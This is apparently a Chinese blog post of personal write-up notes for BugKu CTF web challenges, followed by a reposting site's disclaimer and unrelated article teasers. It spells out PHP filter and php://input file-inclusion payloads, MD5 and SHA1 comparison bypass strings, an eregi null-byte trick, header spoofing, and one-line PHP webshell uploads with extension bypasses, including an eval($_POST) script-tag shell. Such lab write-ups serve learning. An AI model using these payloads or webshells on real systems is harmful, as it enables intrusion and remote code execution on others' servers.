bugkuctf web随记wp

常规思路:

1,源码2,抓包3,御剑+dirsearch扫后台检查是否有git文件未删除4,参数

本地管理员:1,c+u看源码,s+c+i看源码有一串东西2,base64解码后是test123猜测是密码3,抓包把admin和test123放上去,由于提示了是本地管理员,所以在包里加一行x-forwarded-for:127.0.0.1声明自己是host本地地址

Game:1,边玩游戏边抓包2,包里有score和sign,其中sign很像base64但是有三个=,可能是base32或者base64+=或者==构造的,后面发现sign是zM+base64编码的分数+==构造的,sign是分数的密文3,把分数明文密文改成一致且分数改高发包即可返回flag

备份是个好习惯:

1,扫后台有index.php.bak的文件,或者提示了备份可以尝试index_bak.php或者index.php.bak这两个名字

2,文件删掉bak后缀,用notepad打开代码审计,是MD5弱类型比较

Strstr截取?和?之后的字符串;substr()返回从$str[1]开始的字符串(等于是去掉了?);str_replace()把key替换为空;parse_str()把字符串解析到变量中,parse_str(‘a=1&b=2’)等价于$a=1;$b=2;

3,MD5绕过MD5绕过的技巧_md5强类型绕过-CSDN博客 

MD5值以0e开头的字符串弱类型比较会被认为科学计数法,以此绕过,如

s878926199a s155964671a (双重MD5绕过CbDLytmyGm2xQyaLNhWn,

770hQgrBOjrcqftrlaZk,7r4lGXCH2Ksu2JNT3BYM)

MD5处理不了数组会返回FALSE,两个FALSE等价 payload:?kekeyy1[]=1&kekeyy2[]=2

eval:include函数,怀疑存在文件包含漏洞,再看题目的eval函数得知存在代码执行的漏洞,可以结合二者,将flag.php的信息获取传递给参数a的值进行代码执行输出flag。即?hello=file('flag.php')(图里边的flag不是真的)

变量:

error_reporting(0);//关闭PHP错误显示;

include "flag1.php";// 引入flag1.php文件代码

highlight_file(__file__);//对文件进行语法高亮显示

if(isset($_GET['args'])){//判断url直接定义的args是否存在

$args = $_GET['args'];//将GET赋值的args赋值给变量$args

if(!preg_match("/^\w+$/",$args)){// /^开始, \w表示任意一个单词字符,即[a-zA-Z0-9_] ,+将前面的字符匹配一次或多次,$/结尾

die("args error!");//输出 args error!

}

eval("var_dump($$args);");//此函数显示一个或多个表达式的信息,包括表达式的类型与值

Source:git泄露1,御剑和gobuster扫描(gobuster dir -u http://114.67.246.176:10491/ -w /usr/share/wordlists/dirb/common.txt),gobuster扫出git文件,wget -r http://114.67.246.176:10491/.git递归下载所有文件夹和文件,git reflog查看版本日志,git show不断往下翻

1,file=/etc/passwd能爆出数据说明有文件包含漏洞

  1. ?file=php://filter/read=convert.base64-encode/resource=index.php
  2. Base64解码

Cookies:

1,首先观察到filename后面是base64编码

解码后:

2,尝试把keys.txt改成index.php,将其编码替换,line的值改动发现有代码,代码审计时间到

    <?php

    error_reporting(0);

    $file=base64_decode(isset($_GET['filename'])?$_GET['filename']:"");

    $line=isset($_GET['line'])?intval($_GET['line']):0;

    if($file=='') header("location:index.php?line=&filename=a2V5cy50eHQ=");

    $file_list = array(

    '0' =>'keys.txt',

    '1' =>'index.php',

    ); 

    if(isset($_COOKIE['margin']) && $_COOKIE['margin']=='margin'){

    $file_list[2]='keys.php';    

    }

    if(in_array($file, $file_list)){

    $fa = file($file);

    echo $fa[$line];

    }

?>

分析源代码,当cookie的margin=margin时,可以访问一个keys.php文件

filename的值改为base64加密后的keys.php

3,抓包改cookie改filename,回显出flag

never_give_up:

 1,id参数换来换去没用,看源码有一个1p.html的文件,如果把hello.php改成手打的1p.html会重定向到bugku首页,改成复制于源码的就能正常跳转到新代码

2,把中间那串东西url解码,再base64解码,再把一段东西url解码(直接丢给GPT分析也行但是也别太信,一开始GPT没分析出还有段url解码,还得是自己动手)

  1. 分析代码

<?PHP

if(!$_GET['id'])//GET方法获得id的值

{

header('Location: hello.php?id=1');

exit();

}

$id=$_GET['id'];

$a=$_GET['a'];

$b=$_GET['b'];

if(stripos($a,'.'))//如果a中有'.'就返回('.'貌似没有绕过的方法)因此用a传入文件基本是死路一条

{

echo 'no no no no no no no';

return ;

}

$data = @file_get_contents($a,'r');//以只读的方式获得a传入文件的信息

if($data=="bugku is a nice plateform!" and $id==0 and strlen($b)>5 and eregi("111".substr($b,0,1),"1114") and substr($b,0,1)!=4)

{

$flag = "flag{***********}"

}

else

{

print "never never never give up !!!";

}

?>

  1. 有flag出现的条件:data=="bugku is a nice plateform!" ,id==0,b的长度>5,第一位可以加在111后匹配1114,并且第一位又不是4

php://input 是个可以访问请求的原始数据的只读流,只需在数据流中写入要读取的内容即可

弱比较0的绕过可以换成1,字符串2,科学计数法0e1111

ereg() 函数或 eregi() 函数存在空字符截断漏洞,eregi是正则匹配函数,第一个参数是pattern,第二个参数是要匹配的内容

两种绕过方式:1.利用该函数的空截断漏洞,开头就是\x00,后面不管是什么都会匹配成功,后端得到的是\x00,这中间还有个解码过程,因此要对\x00进行url编码为%00,如果用这种方法b要在最后,不然过早把\x00放入会把a也截断

  1. 正则匹配为真就行,b等于*123456 ?123456 +123456这些

记得把GET改为POST

过狗一句话:

1,GPT分析题目给的代码

xxx二手市场:

  1. sql注入行不通,登录也正常,后面在上传头像的地方做手脚

  1. 把image里base64后面的东西全删了换成一句话木马,image/jpeg换成image/php,php作为文件后缀,后面的东西看上去都base64了,所以木马也要base64

3,回显里data那里把\删掉,用靶场url地址+这串删掉\的东西,蚁剑链接这串地址(http://题目地址/Uploads/heads/60eb9069c88e6624.php),然后在html目录下翻出flag

轻轻晕倒:

不知道,把答案copy过来可能以后就知道了。哈哈。

一、目标是输出flag变量,所以flag就在flag变量里面,输出条件有三个

1,flag变量长度等于$exam的长度,长度为49

2,flag变量不能包含` , “ , . , \ , ( , ) , [ , ] , _ , flag , echo , print , require , include , die , exit ;

3,eval($_GET[‘flag’]) === sha1($flag)

前面两个条件好绕过,就是第三个条件比较麻烦

我们可以利用php短标签来绕过

*   <? ?>和<?= ?>是短标签而<?php ?>是长标签,其中<?= 是代替 <? echo的,<? ?>代替的是<?php ?>,当PHP不支持使用短标签时,请到PHP的安装目录下找到PHP.INI文件:short_open_tag=On。php5默认的标记为<?php ?>              二、直接利用eval输出$flag变量的值,payload为?flag=$a='dlag';$a{0}='f';?>11111111111111111;<?=$$a;?>,其中?>用于闭合开头的<?php 标记,111…111是用来填充长度的。直接输出flag变量中的flag值,不需要再和sha1($flag)比较。

想死。

速度要快:1,源码里说把找到的东西传参给margin然后以post形式提交2,抓包看见返回的请求头里有flag后面跟着base64编码,解码后还有一个,再解码后剩下一串数字 3,第二次抓包后请求头flag变了,解码两次后数字又变了,所以应该是快速解码然后快速post提交4,写脚本,不会写,抄的。

前女友:MD5绕过,但是不知道为什么v3不等于flag的话为什么一定得是个数组

1,网页只有字,查看源码发现code.txt

2,要求v3不等于flag值,v1!=v2但是需要MD5值相同,可以数组绕过或者

3,但是v3只能数组绕过别的不行

SQL约束攻击:

懒得写,截图

你来自哪里:

看题目知道是抓包改Referer:https://www.google.com

各种绕过哟:

  1. 代码首先调用 highlight_file() 函数来显示名为 "flag.php" 的文件的源代码。接下来,代码将 GET 参数 id 进行 URL 解码,并赋值给 $_GET['id']。然后,定义了一个变量 $flag,并给它赋了一个字符串值。

条件:当uname 不等于 passwd,且 uname 和 passwd 的sha1()哈希值相等,且 id 的值等于 "margin"),则会输出 $flag 的值

Sha1()绕过:1,和MD5一样数组绕过2,10932435112,aaroZmOk,aaK1STfY

2,Content-Type: application/x-www-form-urlencoded 用于指示请求体中的数据是经过 URL 编码格式(key1=value1&key2=value2)的表单数据。其通常是通过 POST 方法向服务器提交表单数据。在这种情况下,请求体中的数据会被编码成键值对的形式,并以 & 符号分隔。bp包里面必须得加上这段(为了对应上id也得url编码吗?),且get改post

文件包含:

  1. 要求ac和fn的值一样
  2. 抓包 ?ac=1&fn=php://input  post传值1

文件上传:

上传一句话木马,抓包,改Content-Type:为image/jpeg,把filename="1.php"改成filename="1.php4"(php2,php3,php4,php5,php6,php7,phps,phpt,phtml,phtm,Php,php:.jpg)

一般都是/upload查找含有的文件访问,原URL/upload/filename

蚁剑连找flag文件

上传图片马,抓包改为php后缀

死文件包含2加密脚本 需要倒着写解密

<?php

function encrypt($data,$key)

{

    $key = md5('ISCC');

    $x = 0;

    $len = strlen($data);

    $klen = strlen($key);

    for ($i=0; $i < $len; $i++) {

        if ($x == $klen)

        {

            $x = 0;

        }

        $char .= $key[$x];

        $x+=1;

    }

    for ($i=0; $i < $len; $i++) {

        $str .= chr((ord($data[$i]) + ord($char[$i])) % 128);

    }

    return base64_encode($str);

}

?>

文件包含2:

1,看源码有提示upload.php,打开发现可以上传图片,上传一句话木马,把filename那里改成1.php:.jpg

<?php和?>被过滤了,换成plus.php即另一个绕过的木马<script language=php>echo 'a'; eval($_POST['a']);</script>,页面显示a即成功。蚁剑链接

好像需要管理员:

  1. 蚁剑扫出robots.txt 打开发现有个resusl.php的提示,打开resusl.php显示我不是管理员。如果x参数等于密码就发金水,所以直接抓包爆破

2,然后最后试到密码是admin,回显出flag

点login没反应:

  1. 看源码admin.css是超链接,点一下

2,源码出现,当cookie反序列化后强等于$KEY时,flag出现

$_COOKIE [ ] 数组:可以读取Cookie变量的值

3,把那串东西序列化

  1. 可以从上面的代码知道调用的 cookie 名称为 BUGKU,抓包把cookie那一栏直接换成BUGKU=s:13:"ctf.bugku.com";(而不是放在下面!!下面是post)

直接text=不行的话就data

?text=data://text/plain,welcome to the zjctf

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.rhkb.cn/news/217555.html

如若内容造成侵权/违法违规/事实不符,请联系长河编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

企业打造高产出的新媒体运营团队的步骤有哪些?

企业在搭建新媒体矩阵的过程中&#xff0c;第一步是确定平台&#xff0c;第二步就是组建一个运营团队。 但组建一个高质量的运营团队并非容易的事情&#xff0c;很多企业可能都不知道&#xff1a; 不同规模的企业需要什么样的运营团队&#xff1f;运营团队中的不同岗位需要做哪…

【机器学习】利用线性回归预测披萨价格

目录 前言 一、绘制散点图 二、数据准备 三、一元线性回归模型训练 四、一元线性回归模型评估 总结 &#x1f308;嗨&#xff01;我是Filotimo__&#x1f308;。很高兴与大家相识&#xff0c;希望我的博客能对你有所帮助。 &#x1f4a1;本文由Filotimo__✍️原创&#xff0c;首…

Linux查询指定时间点段日志Linux查询指定文件

Linux服务器高效查询日志查询文件 Ⅰ、常用几种日志查询语法Ⅱ、常用几种查询语法 Ⅰ、常用几种日志查询语法 #查询某日志前xx行日志 head -n 行数 日志文件名 #查询某日志后xx行日志 tail -n 行数 日志文件名 #查询固定时间点日志&#xff08;前提是这个时间点确实有日志输出…

基于javaweb实现的实践教学基地管理系统

一、系统架构 前端&#xff1a;html | js | css | bootstrap 后端&#xff1a;spring | springmvc | mybatis-plus 环境&#xff1a;jdk1.8 | mysql8 | tomcat | maven 二、代码及数据库 三、功能介绍 01. web-首页1 02. web-首页2 03. web-首页3 04. web-首页4 05. 管…

代码随想录27期|Python|Day15|二叉树|层序遍历|对称二叉树|翻转二叉树

本文图片来源&#xff1a;代码随想录 层序遍历&#xff08;图论中的广度优先遍历&#xff09; 这一部分有10道题&#xff0c;全部可以套用相同的层序遍历方法&#xff0c;但是需要在每一层进行处理或者修改。 102. 二叉树的层序遍历 - 力扣&#xff08;LeetCode&#xff09; 层…

集简云 x 零售企业丨快速集成有赞商城和微盛企微管家,实现私域运营自动化

客户介绍 某公司是一家知名的饮料厂商&#xff0c;自1998年成立以来&#xff0c;一直致力于研发和生产各种热门饮品&#xff0c;如果汁、碳酸饮料、矿泉水等。因其独特的口感和健康的品质深受消费者的喜爱。企业拥有多个知名品牌&#xff0c;享有极高的品牌知名度和市场份额。该…

jsp文件引用的css修改后刷新不生效问题

问题 在对 JavaWeb 项目修改的过程中&#xff0c;发现修改了 jsp 文件引入的 css 文件的代码后页面的样式没有更新的问题。 原因 导致这个问题的原因可能是因为浏览器缓存的问题。 解决方法 下面介绍两种解决方法&#xff0c;供大家参考&#xff1a; 1、给 link 标签的 c…

持续集成交付CICD:CentOS 7 安装 Nexus 3.63

目录 一、实验 1.CentOS 7 安装Nexus3.63 二、问题 1.安装Nexus报错 2.Nexus启动停止相关命令 一、实验 1.CentOS 7 安装Nexus3.63 &#xff08;1&#xff09;当前操作系统版本&JDK版本 cat /etc/redhat-releasejava -version&#xff08;2&#xff09;下载Nexus新…

椋鸟C语言笔记#26:数据在内存中的存储(大小端字节序)、浮点数的存储(IEEE754)

萌新的学习笔记&#xff0c;写错了恳请斧正。 目录 大小端字节序 什么是大小端 写一个判断大小端的程序 浮点数在内存中的存储&#xff08;IEEE 754规则&#xff09; 引入 存储规则解释 读取规则解释 1.阶码不全为0或全为1&#xff08;规格化数&#xff09; 2.阶码全为…

SQLMAP的使用(rails 为例)

1.启动一个项目&#xff0c;例如rails学习的项目&#xff0c;修改config/database.yml&#xff0c; 假设来一个接口&#xfeff; class YourModel::YourController < ApplicationController def test_sqlisql "select * from your_table_name where id " par…

亿欧网首届“元创·灵镜”科技艺术节精彩纷呈,实在智能AI Agent智能体展现硬核科技图景

12月4日-10日&#xff0c;持续一周的首届“元创灵镜”科技艺术节在海南陵水香水湾拉开帷幕&#xff0c;虚实交互创造出的“海岛之镜”开幕式呈现出既真实又虚幻的未来感&#xff0c;融入前沿科技元素的艺术装置作品在“虚实之镜&自然生长”科技艺术展诠释着浪漫想象&#x…

VS2022 将项目打包,导出为exe运行

我有一个在 VS2022 上开发的程序&#xff0c;基于.net 6框架, 想打包成 .exe程序&#xff0c;以在另一个没有安装VS的机器上运行&#xff0c;另一个机器是Win7系统&#xff0c;上面安装了.net 6框架。 虽然网上很多教程&#xff0c;需要安装Project Installer&#xff0c;配置A…

用23种设计模式打造一个cocos creator的游戏框架----(十二)状态模式

1、模式标准 模式名称&#xff1a;状态模式 模式分类&#xff1a;行为型 模式意图&#xff1a;允许一个对象在其内部状态改变时改变它的行为。对象看起来似乎修改了它的类。 结构图&#xff1a; 适用于&#xff1a; 1、一个对象的行为决定于它的状态&#xff0c;并且它必须…

CommonJs模块化实现原理ES Module模块化原理

CommonJs模块化实现原理 首先看一个案例 初始化项目 npm init npm i webpack -D目录结构如下&#xff1a; webpack.config.js const path require("path"); module.exports {mode: "development",entry: "./src/index.js",output: {path: p…

2019年第八届数学建模国际赛小美赛C题预测通过拥堵路段所需的时间解题全过程文档及程序

2019年第八届数学建模国际赛小美赛 C题 预测通过拥堵路段所需的时间 原题再现&#xff1a; 在导航软件中&#xff0c;行程时间的估计往往是一个重要的功能。现有的导航软件往往通过出租车或安装了该软件的车辆获取实时GPS数据来确定当前的路况。在交通拥堵严重的情况下&#…

安装LLaMA-Factory微调chatglm3,修改自我认知

安装git clone https://github.com/hiyouga/LLaMA-Factory.git conda create -n llama_factory python3.10 conda activate llama_factory cd LLaMA-Factory pip install -r requirements.txt 之后运行 单卡训练&#xff0c; CUDA_VISIBLE_DEVICES0 python src/train_web.py…

过拟合与欠拟合

一、模型选择 1、问题导入 2、训练误差与泛化误差 3、验证数据集和测试数据集 4、K-折交叉验证 一般在没有足够多数据时使用。 二、过拟合与欠拟合 1、过拟合 过拟合的定义&#xff1a; 当学习器把训练样本学的“太好”了的时候&#xff0c;很可能已经把训练样本自身的一些特…

Navicat16 无限试用 亲测有效

Navicat16 无限试用 亲测有效 亲测有效&#xff01;&#xff01;&#xff01; 吐槽下&#xff0c;有的用不了&#xff0c;有的是图片&#xff0c;更甚者还有收费的&#xff0c;6的一批 粘贴下面的代码&#xff0c;保存到桌面&#xff0c;命名为 trial-navicat16.bat echo off…

探索GameFi:区块链与游戏的未来融合

在过去的几年里&#xff0c;区块链技术逐渐渗透到各个领域&#xff0c;为不同行业带来了前所未有的变革。其中&#xff0c;游戏行业成为了一个引人注目的焦点&#xff0c;而这种结合被称为GameFi&#xff0c;即游戏金融。GameFi不仅仅是一个概念&#xff0c;更是一场区块链和游…

宏景eHR SQL 注入漏洞复现(CVE-2023-6655)

0x01 产品简介 宏景eHR人力资源管理软件是一款人力资源管理与数字化应用相融合,满足动态化、协同化、流程化、战略化需求的软件。 0x02 漏洞概述 宏景eHR 中发现了一种被分类为关键的漏洞,该漏洞影响了Login Interface组件中/w_selfservice/oauthservlet/%2e../.%2e/genera…